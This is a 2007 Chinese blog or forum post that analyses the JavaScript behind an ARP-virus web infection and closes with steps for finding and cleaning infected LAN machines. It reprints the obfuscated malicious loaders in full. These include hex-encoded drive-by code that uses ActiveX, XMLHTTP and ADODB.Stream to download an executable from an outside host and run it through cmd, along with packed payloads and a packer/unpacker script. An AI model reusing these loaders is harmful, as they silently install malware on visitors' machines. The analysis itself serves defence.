Analysis of the Javascript technology used behind the arp virus with decryption method

本文的目的是探讨JS相关技术，并不是以杀毒为主要目的，杀毒只是为讲解一些JS做铺垫的，呵呵，文章有点长，倒杯咖啡或者清茶慢慢看，学习切勿急躁！

最近公司的网络中了这两天闹的很欢的ARP病毒，导致大家都无法上网，给工作带来了很大的不方便，在这里写下杀毒的过程，希望对大家能有帮助！

现象：打开部分网页显示为乱码，好像是随机的行为，但是看似又不是，因为它一直在监视msn.com，呵呵，可能和微软有仇吧，继续查看源代码，发现头部有一个js文件链接----<script></script>；

来源：经过一番网络搜索，发现这个域名是印度域名，而IP地址却是美国的，而且域名的注册日期是7月25日，看来一切都是预谋好了的，还是不管这个了，先解决问题吧；

分析：
1、先把（http://9-6.in/n.js）这个JS文件下载下来，代码如下：

 document.writeln("<script>window.onerror=function(){return true;}<\/script>"); document.writeln("<script src=\"http:\/\/9-6.in\/S368\/NewJs2.js\"><\/script>"); document.writeln("<script>"); document.writeln("function StartRun(){"); document.writeln("var Then = new Date() "); document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)"); document.writeln("var cookieString = new String(document.cookie)"); document.writeln("var cookieHeader = \"Cookie1=\" "); document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)"); document.writeln("if (beginPosition != -1){ "); document.writeln("} else "); document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() "); document.writeln("document.write(\'<iframe width=0 height=0 src=\"http:\/\/9-6.IN\/s368\/T368.htm\"><\/iframe>\');"); document.writeln("}"); document.writeln("}"); document.writeln("StartRun();"); document.writeln("<\/script>") 其中第一句window.onerror=function(){return true;}就先把JS错误屏蔽掉，真够狠的，呵呵，不这样怎么隐藏自己呢，哈哈！然后还有个JS文件http://9-6.in/S368/NewJs2.js，先继续往下看，找到StartRun();运行一个函数，函数的主要作用是写COOKIE，日期为保存一天，然后还用隐藏框架加载了一个文件（http://9-6.IN/s368/T368.htm），其余就没有什么特别的了； 2、下载（http://9-6.in/S368/NewJs2.js）这个文件，代码如下： StrInfo = "\x3c\x73\x63\x72\x69\x70\x74\x3e\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x72\x65\x74\x75\x72\x6e \x74\x72\x75\x65\x3b\x7d\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e" +"\n"+ "\x3c\x73\x63\x72\x69\x70\x74\x3e" +"\n"+ " \x44\x5a\x3d\'\\\x78\x36\x38\\\x78\x37\x34\\\x78\x37\x34\\\x78\x37\x30\\\x78\x33\x41\\\x78\x32\x46\\\x78\x32\x46\\\x78\x33\x39\\\x78\x32\x44\\\x78\x33\x36\\\x78\x32\x45\\\x78\x36\x39\\\x78\x36\x45\\\x78\x32\x46\\\x78\x35\x33\\\x78\x33\x33\\\x78\x33\x36\\\x78\x33\x38\\\x78\x32\x46\\\x78\x35\x33\\\x78\x33\x33\\\x78\x33\x36\\\x78\x33\x38\\\x78\x32\x45\\\x78\x36\x35\\\x78\x37\x38\\\x78\x36\x35\'\x3b" +"\n"+ " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ "\x66\x75\x6e\x63\x74\x69\x6f\x6e \x47\x6e\x4d\x73\x28\x6e\x29 " +"\n"+ "\x7b " +"\n"+ " \x76\x61\x72 \x6e\x75\x6d\x62\x65\x72\x4d\x73 \x3d \x4d\x61\x74\x68\x2e\x72\x61\x6e\x64\x6f\x6d\x28\x29\x2a\x6e\x3b" +"\n"+ " \x72\x65\x74\x75\x72\x6e \'\\\x78\x37\x45\\\x78\x35\x34\\\x78\x36\x35\\\x78\x36\x44\\\x78\x37\x30\'\x2b\x4d\x61\x74\x68\x2e\x72\x6f\x75\x6e\x64\x28\x6e\x75\x6d\x62\x65\x72\x4d\x73\x29\x2b\'\\\x78\x32\x45\\\x78\x37\x34\\\x78\x36\x44\\\x78\x37\x30\'\x3b" +"\n"+ "\x7d " +"\n"+ " \x74\x72\x79 " +"\n"+ "\x7b" +"\n"+ " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ " \x76\x61\x72 \x42\x66\x3d\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\"\\\x78\x36\x46\\\x78\x36\x32\\\x78\x36\x41\\\x78\x36\x35\\\x78\x36\x33\\\x78\x37\x34\"\x29\x3b" +"\n"+ " \x42\x66\x2e\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\"\\\x78\x36\x33\\\x78\x36\x43\\\x78\x36\x31\\\x78\x37\x33\\\x78\x37\x33\\\x78\x36\x39\\\x78\x36\x34\"\x2c\"\\\x78\x36\x33\\\x78\x36\x43\\\x78\x37\x33\\\x78\x36\x39\\\x78\x36\x34\\\x78\x33\x41\\\x78\x34\x32\\\x78\x34\x34\\\x78\x33\x39\\\x78\x33\x36\\\x78\x34\x33\\\x78\x33\x35\\\x78\x33\x35\\\x78\x33\x36\\\x78\x32\x44\\\x78\x33\x36\\\x78\x33\x35\\\x78\x34\x31\\\x78\x33\x33\\\x78\x32\x44\\\x78\x33\x31\\\x78\x33\x31\\\x78\x34\x34\\\x78\x33\x30\\\x78\x32\x44\\\x78\x33\x39\\\x78\x33\x38\\\x78\x33\x33\\\x78\x34\x31\\\x78\x32\x44\\\x78\x33\x30\\\x78\x33\x30\\\x78\x34\x33\\\x78\x33\x30\\\x78\x33\x34\\\x78\x34\x36\\\x78\x34\x33\\\x78\x33\x32\\\x78\x33\x39\\\x78\x34\x35\\\x78\x33\x33\\\x78\x33\x36\"\x29\x3b" +"\n"+ " \x76\x61\x72 \x4b\x78\x3d\x42\x66\x2e\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74\x28\"\\\x78\x34\x44\\\x78\x36\x39\\\x78\x36\x33\\\x78\x37\x32\\\x78\x36\x46\\\x78\x37\x33\\\x78\x36\x46\\\x78\x36\x36\\\x78\x37\x34\\\x78\x32\x45\\\x78\x35\x38\"\x2b\"\\\x78\x34\x44\\\x78\x34\x43\\\x78\x34\x38\\\x78\x35\x34\\\x78\x35\x34\\\x78\x35\x30\"\x2c\"\"\x29\x3b" +"\n"+ " \x76\x61\x72 \x41\x53\x3d\x42\x66\x2e\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74\x28\"\\\x78\x34\x31\\\x78\x36\x34\\\x78\x36\x46\\\x78\x36\x34\\\x78\x36\x32\\\x78\x32\x45\\\x78\x35\x33\\\x78\x37\x34\\\x78\x37\x32\\\x78\x36\x35\\\x78\x36\x31\\\x78\x36\x44\"\x2c\"\"\x29\x3b" +"\n"+ " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ " \x41\x53\x2e\x74\x79\x70\x65\x3d\x31\x3b" +"\n"+ " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ " \x4b\x78\x2e\x6f\x70\x65\x6e\x28\"\\\x78\x34\x37\\\x78\x34\x35\\\x78\x35\x34\"\x2c \x44\x5a\x2c\x30\x29\x3b" +"\n"+ " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ " \x4b\x78\x2e\x73\x65\x6e\x64\x28\x29\x3b" +"\n"+ " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ " \x4e\x73\x31\x3d\x47\x6e\x4d\x73\x28\x39\x39\x39\x39\x29\x3b" +"\n"+ " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ " \x76\x61\x72 \x63\x46\x3d\x42\x66\x2e\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74\x28\"\\\x78\x35\x33\\\x78\x36\x33\\\x78\x37\x32\\\x78\x36\x39\\\x78\x37\x30\\\x78\x37\x34\\\x78\x36\x39\\\x78\x36\x45\\\x78\x36\x37\\\x78\x32\x45\\\x78\x34\x36\\\x78\x36\x39\\\x78\x36\x43\\\x78\x36\x35\\\x78\x35\x33\\\x78\x37\x39\\\x78\x37\x33\\\x78\x37\x34\\\x78\x36\x35\\\x78\x36\x44\\\x78\x34\x46\\\x78\x36\x32\\\x78\x36\x41\\\x78\x36\x35\\\x78\x36\x33\\\x78\x37\x34\"\x2c\"\"\x29\x3b" +"\n"+ " \x76\x61\x72 \x4e\x73\x54\x6d\x70\x3d\x63\x46\x2e\x47\x65\x74\x53\x70\x65\x63\x69\x61\x6c\x46\x6f\x6c\x64\x65\x72\x28\x30\x29\x3b \x4e\x73\x31\x3d \x63\x46\x2e\x42\x75\x69\x6c\x64\x50\x61\x74\x68\x28\x4e\x73\x54\x6d\x70\x2c\x4e\x73\x31\x29\x3b \x41\x53\x2e\x4f\x70\x65\x6e\x28\x29\x3b\x41\x53\x2e\x57\x72\x69\x74\x65\x28\x4b\x78\x2e\x72\x65\x73\x70\x6f\x6e\x73\x65\x42\x6f\x64\x79\x29\x3b" +"\n"+ " \x41\x53\x2e\x53\x61\x76\x65\x54\x6f\x46\x69\x6c\x65\x28\x4e\x73\x31\x2c\x32\x29\x3b \x41\x53\x2e\x43\x6c\x6f\x73\x65\x28\x29\x3b \x76\x61\x72 \x71\x3d\x42\x66\x2e\x43\x72\x65\x61\x74\x65\x4f\x62\x6a\x65\x63\x74\x28\"\\\x78\x35\x33\\\x78\x36\x38\\\x78\x36\x35\\\x78\x36\x43\\\x78\x36\x43\\\x78\x32\x45\\\x78\x34\x31\\\x78\x37\x30\\\x78\x37\x30\\\x78\x36\x43\\\x78\x36\x39\\\x78\x36\x33\\\x78\x36\x31\\\x78\x37\x34\\\x78\x36\x39\\\x78\x36\x46\\\x78\x36\x45\"\x2c\"\"\x29\x3b" +"\n"+ " \x6f\x6b\x31\x3d\x63\x46\x2e\x42\x75\x69\x6c\x64\x50\x61\x74\x68\x28\x4e\x73\x54\x6d\x70\x2b\'\\\x78\x35\x43\\\x78\x35\x43\\\x78\x37\x33\\\x78\x37\x39\\\x78\x37\x33\\\x78\x37\x34\\\x78\x36\x35\\\x78\x36\x44\\\x78\x33\x33\\\x78\x33\x32\'\x2c\'\\\x78\x36\x33\\\x78\x36\x44\\\x78\x36\x34\\\x78\x32\x45\\\x78\x36\x35\\\x78\x37\x38\\\x78\x36\x35\'\x29\x3b" +"\n"+ " \x71\x2e\x53\x48\x65\x4c\x4c\x45\x78\x65\x63\x75\x74\x65\x28\x6f\x6b\x31\x2c\'\\\x78\x32\x30\\\x78\x32\x46\\\x78\x36\x33 \'\x2b\x4e\x73\x31\x2c\"\"\x2c\"\\\x78\x36\x46\\\x78\x37\x30\\\x78\x36\x35\\\x78\x36\x45\"\x2c\x30\x29\x3b" +"\n"+ " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ "\x7d " +"\n"+ " \x63\x61\x74\x63\x68\x28\x4d\x73\x49\x29 \x7b \x4d\x73\x49\x3d\x31\x3b \x7d" +"\n"+ " \x4e\x6f\x73\x6b\x73\x6c\x61\x3d\'\'\x3b" +"\n"+ "\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e" window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](StrInfo); 这个代码有点长哦，而且有保护措施，全部转换为十六进制，不过不要害怕，我们有办法解决，首先得确保你已经安装了UE，然后打开UE，把代码粘贴进去（废话，呵呵），把x替换为%，然后用html代码转换功能，解码，就可以得到第一次解码的代码，第一次？？？，呵呵，这个代码的作者很变态的，做了两次编码，所以我得进行两次解码才行，重复刚才的步骤，然后你就可以看到最终的“原始”代码了； 具体的代码我就不帖出来了，有一定的危害性，相信大家看了上面的步骤都能自己找到代码，这里之说一下比较核心的代码吧； [Copy to clipboard] [ - ]CODE: //核心代码 .............. " var Bf=document.createElement(\"\o\b\j\e\c\t\");" +"\n"+ " Bf.setAttribute(\"\c\l\a\s\s\i\d\",\"\c\l\s\i\d\:\B\D\9\6\C\5\5\6\-\6\5\A\3\-\1\1\D\0\-\9\8\3\A\-\0\0\C\0\4\F\C\2\9\E\3\6\");" +"\n"+ " var Kx=Bf.CreateObject(\"\M\i\c\r\o\s\o\f\t\.\X\"+\"\M\L\H\T\T\P\",\"\");" +"\n"+ " var AS=Bf.CreateObject(\"\A\d\o\d\b\.\S\t\r\e\a\m\",\"\");" +"\n"+ ............. " var cF=Bf.CreateObject(\"\S\c\r\i\p\t\i\n\g\.\F\i\l\e\S\y\s\t\e\m\O\b\j\e\c\t\",\"\");" +"\n"+ " var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);" +"\n"+ " AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject(\"\S\h\e\l\l\.\A\p\p\l\i\c\a\t\i\o\n\",\"\");" +"\n"+ " ok1=cF.BuildPath(NsTmp+\'\\\\\s\y\s\t\e\m\3\2\',\'\c\m\d\.\e\x\e\');" +"\n"+ " q.SHeLLExecute(ok1,\'\ \/\c \'+Ns1,\"\",\"\o\p\e\n\",0);" +"\n"+ .............. 上面的就是最为核心的代码，利用MS0614漏洞、创建JS异步对象获取病毒（*.exe）文件，然后运行，这样就达到它的目的啦！ 3、打开http://9-6.IN/s368/T368.htm查看源代码，又发现一段怪异的JS文件，如下： [Copy to clipboard] [ - ]CODE: <script> eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('x("\\0\\6\\9\\5\\i\\h\\j\\j\\4\\f\\8\\3\\2\\0\\7\\1\\i\\8\\2\\3\\h\\g\\4\\w\\v\\u\\t\\b\\s\\7\\r\\g\\4\\e\\f\\q\\8\\3\\2\\0\\7\\1\\e\\4\\d\\c\\d\\c\\p\\5\\3\\o\\n\\a\\6\\1\\b\\m\\2\\0\\1\\a\\l\\0\\6\\9\\5\\k")',34,34,'151|164|162|143|42|157|156|160|163|146|145|56|12|15|76|74|134|75|40|11|51|50|167|155|165|144|57|147|152|70|66|63|123|eval'.split('|'),0,{})) </script>

本帖最近评分记录
bound0 2007-8-6 19:01 威望 +1 鼓励研究精神！:D

引用 报告回复 心中有梦
[广告] 【万网邮箱DIY，灵活购买】| 西部数码多线虚拟主机全国10强

veking [楼主]

蓝色水
高级会员

帖子 275
体力 733
威望 1
注册 2005-6-16
#2发表于 2007-8-6 16:06 资料 短消息 加为好友
解析arp病毒背后利用的Javascript技术

可以看出这段代码也是经过加密的了，特征为function(p,a,c,k,e,d)，这种加密方法网上有很多例子，我就不细说了，附上解密代码：

[Copy to clipboard] [ - ]CODE:
//以下代码为网上搜索所得，版权归原作者所有
nbsp;html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

无标题文档

<script> a=62; function encode() { var code = document.getElementById('code').value; code = code.replace(/[\r\n]+/g, ''); code = code.replace(/'/g, "\\'"); var tmp = code.match(/\b(\w+)\b/g); tmp.sort(); var dict = []; var i, t = ''; for(var i=0; i<tmp .length; i++) { if(tmp[i] != t) dict.push(t = tmp[i]); } var len = dict.length; var ch; for(i=0; i<len; i++) { ch = num(i); code = code.replace(new RegExp('\\b'+dict[i]+'\\b','g'), ch); if(ch == dict[i]) dict[i] = ''; } document.getElementById('code').value = "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}(" + "'"+code+"',"+a+","+len+",'"+ dict.join('|')+"'.split('|'),0,{}))"; } function num(c) { return(c<a ?'':num(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36)); } function run() { eval(document.getElementById('code').value); } function decode() { var code = document.getElementById('code').value; code = code.replace(/^eval/, ''); document.getElementById('code').value = eval(code); } </script>

经过解密后代码为：

[Copy to clipboard] [ - ]CODE:
info = "<script></script>"
document.write(info)
继续打开这个表面象图片的链接，呵呵，当然不会是MM图片了，查看源代码，找到如下代码：

[Copy to clipboard] [ - ]CODE:
eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('E n=1c;12 13(){}12 14(){1d{n=1e 1f("\\K\\l\\r\\8\\i\\3\\6\\j\\3\\6\\o\\3\\6\\9\\C\\3\\s\\K\\l\\r\\8\\i\\3\\6\\9\\x")}1g(e){Q}E a=n["\\15\\3\\4\\p\\d\\8\\m\\7\\k"]("\\w\\8\\4\\7\\o\\7\\6\\r\\f","\\R\\7\\q\\3\\v\\5\\4\\l","");1h(a["\\7\\8\\i\\3\\y\\L\\m"]("\\z\\f\\l\\4\\5\\9\\3\\y\\3")!=-1){Q}E b=n["\15\3\4\j\3\6\o\3\6\v\5\4\l"]();b=b["\f\r\s\f\4\6"](0,2);b ="\\\v\6\d\k\6\5\J\x\\\K\l\r\8\i\3\J\x\\\1i\3\s\K\l\r\8\i\3\6\\\A\6\d\m\7\q\3\f\\\r\f\3\6\h\d\8\m\7\k\9\7\8\7";n["\j\3\4\p\5\q\q\s\5\h\1j\F\8\4\6\D"](1k,13);E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\7");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\5");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\s");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\h");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\i");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\7","\S\f\h\6\7\A\4\16\o\5\6 \f\G\8\3\C \w\h\4\7\o\3\N\L\s\T\3\h\4\t\"\C\f\h\6\7\A\4\9\f\l\3\q\q\"\u\g\o\5\6 \d\G\8\3\C \w\h\4\7\o\3\N\L\s\T\3\h\4\t\"\f\l\3\q\q\9\5\A\A\q\7\h\5\4\7\d\8\"\u\g\o\5\6 \5\B\s\B\h\B\i\B\3\B\m\B\k\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\5","\H\g\f\9\U\r\8\t\"\p\V\\\\\v\6\d\k\6\5\J\x\\\\\I\8\4\3\6\8\J\x\\\\\I\F\N\v\17\L\U\F\9\F\N\F \l\4\4\A\1l\O\O\h\1m\x\W\7\18\O\j\X\19\1a\O\i\1n\C\18\Y\Y\W\l\4\Y\1o\"\B\H\B\H\u\g\f\9\U\r\8\t\"\h\z\i\9\3\y\3 \Z\h \4\6\3\3 \h\V\\\\ \Z\m\"\B\H\B\x\u\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\s","\f\9\j\A\3\h\7\5\q\R\d\q\i\3\6\f\t\"\1p\D\1q\d\h\r\z\3\8\4\f\"\u\g\s\G\s\9\f\r\s\f\4\6\7\8\k\t\H\B\s\9\q\5\f\4\I\8\i\3\y\L\m\t\"\\\\\"\u\u\g\s\P\G\"\\\\\q\d\h\5\q\f\J\x\\\\\K\3\z\A\d\6\J\x\\\\\p\d\8\4\3\8\4\9\I\F\1r\\\\\"\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\h","\d\9\1s\5\z\3\j\A\5\h\3\t\s\u\g\m\d\6\t\5\G\H\g\5\S\h\9\I\4\3\z\f\t\u\9\p\d\r\8\4\g\5\P\P\u\10 \o\5\6 \m\G\h\9\I\4\3\z\f\t\u\9\I\4\3\z\t\5\u\9\v\5\4\l\g\m\P\G\"\\\\\j\X\19\1a\1b\1t\x\1u\W\3\y\3\"\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\i","\H\g\4\6\D\10\f\9\F\y\3\h\t\m\u\g\11\h\5\4\h\l\t\3\u\10\11\g\11\C\7\8\i\d\C\9\h\q\d\f\3\t\u\g\S\Z\f\h\6\7\A\4\16");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\v\6\d\4\3\h\4","\x");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\R\7\q\3\v\5\4\l","\h\V\\\C\7\8\i\d\C\f\\\f\D\f\4\3\z\X\1b\\\z\f\l\4\5\9\3\y\3");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\v\5\6\5\z\3\4\3\6",b);n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\F\y\4\17\7\f\4","\9\6\5\6\g\9\M\7\A\g\9\3\y\3\g\9\i\d\h\g\9\h\d\z\g\9\s\7\8\g\9\k\M\g\9\M\g\9\4\5\6\g\9\5\6\T\g\9\q\M\l\g\9\f\7\4\g\9\l\1v\y\g\9\4\k\M\g\9\i\q\q\g\9\d\h\y\g\9\o\s\y\g");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\1w\f\3\6\j\3\4","\x");Q}14();',62,95,'|||x65|x74|x61|x72|x69|x6e|x2e||||x6f||x73|x3b|x63|x64|x53|x67|x68|x66|odks63ls|x76|x43|x6c|x75|x62|x28|x29|x50|x41|x31|x78|x6d|x70|x2c|x77|x79|var|x45|x3d|x30|x49|x7e|x54|x4f|x7a|x58|x2F|x2b|return|x46|x3c|x6a|x52|x3a|x2E|x33|x6D|x2f|x7b|x7d|function|assort_panel_enabled|pslcdkc|x47|x3e|x4c|x6E|x36|x38|x32|null|try|new|ActiveXObject|catch|if|x57|x6b|106|x3A|x6B|x6F|x6C|x4d|x44|x35|x4e|x5B|x5D|x71|x55'.split('|'),0,{}))
又是好长的代码，又发现了function(p,a,c,k,e,r)，继续解码，代码很长，请大家自己解码查看吧，这里应用的还是上面的手法，用加密函数加密，然后转换为十六进制，尽最大努力混淆我们的视线，来达到不可告人的目的，这里的代码的主要作用是用另外一种方法下载病毒并运行，思想真的很先进，居然是去调用Web迅雷来下载病毒，然后去运行，作者真的是煞费苦心啊，应用了两种方法下载病毒，“小样，就不信毒不倒你！", haha
Anti-virus: After talking for a long time, I just analyzed what I was doing when the ARP virus broke out. Now I will talk about the anti-virus issues. In fact, there are many related tutorials in this area on the Internet. I will briefly summarize mine. Let’s go through the anti-virus process;
1. If you are infected by the arp virus, you must first find the infected machine
2. Disconnect the machine from the network and disinfect it
3. Restore the LAN
The first step is the most critical. How to find it?
Open Network Places on any client computer in the LAN, check the workgroup computers, then wait until the list is refreshed, quickly click Start-->Run-->cmd-->arp -a and press Enter. , if there are many machines, please enter arp -a several times, and then check carefully, you will find that the Mac address of one machine is the same as the Mac address of the gateway. Congratulations, this is the source of the virus!
Go to this machine! In front of the machine (haha, there is so much nonsense), I believe everyone has a lot of experience in the remaining work, anti-virus! Install anti-virus software or enter safe mode or even reinstall the machine. In short, just kill the virus;
Finally, execute this command on the machine that cannot open the web page: click Start-->Run-->cmd-->arp -d and press Enter, and then everything is calm again. , isn’t it a great sense of accomplishment, haha!

My first official blog technical article is finally finished, I hope you all like it!

Analysis of the Javascript technology used behind the arp virus with decryption method_javascript skills